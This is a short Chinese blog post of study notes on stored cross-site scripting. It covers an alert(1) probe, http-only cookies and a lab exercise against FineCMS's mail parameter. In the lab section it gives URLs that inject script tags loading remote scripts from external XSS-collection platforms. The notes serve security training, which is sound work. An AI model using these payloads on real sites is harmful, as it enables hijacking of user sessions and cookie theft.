存储型xss

title: “存储型xss”
author: “年轻人”
date: “june 26th, 2021”

存储型xss

xss

提交恶意xss数据,存入应用服务器端,用户访问时被触发
而检验是否存在xss可以通过使用xss弹窗检验

<script>alert(1)</script>

防止窃取cookie:http-only(js不能传递cookie)

cms相关漏洞:

/index.php?c=mail&m=chen<script>alert(1)</script>

检验是否存在漏洞

靶场作业

第一步:xs.sb用临时邮箱注册账号, 创建项目,选择基础默认模块
第二步:查找finecms的xss漏洞
  /index.php?c=mail&m=a<script>alert(1)</script>
  运用xss平台
  http://59.63.200.79:8082/index.php?c=mail&m=123<sCRiPt sRC=https://xss.pt/JNRZ></sCrIpT>
http://59.63.200.79:8082/index.php?c=text&m=<sCRiPt sRC=//xsshs.cn/pp4O></sCrIpT>

上一篇:调用outlook发邮件


下一篇:Dolphinscheduler 学习笔记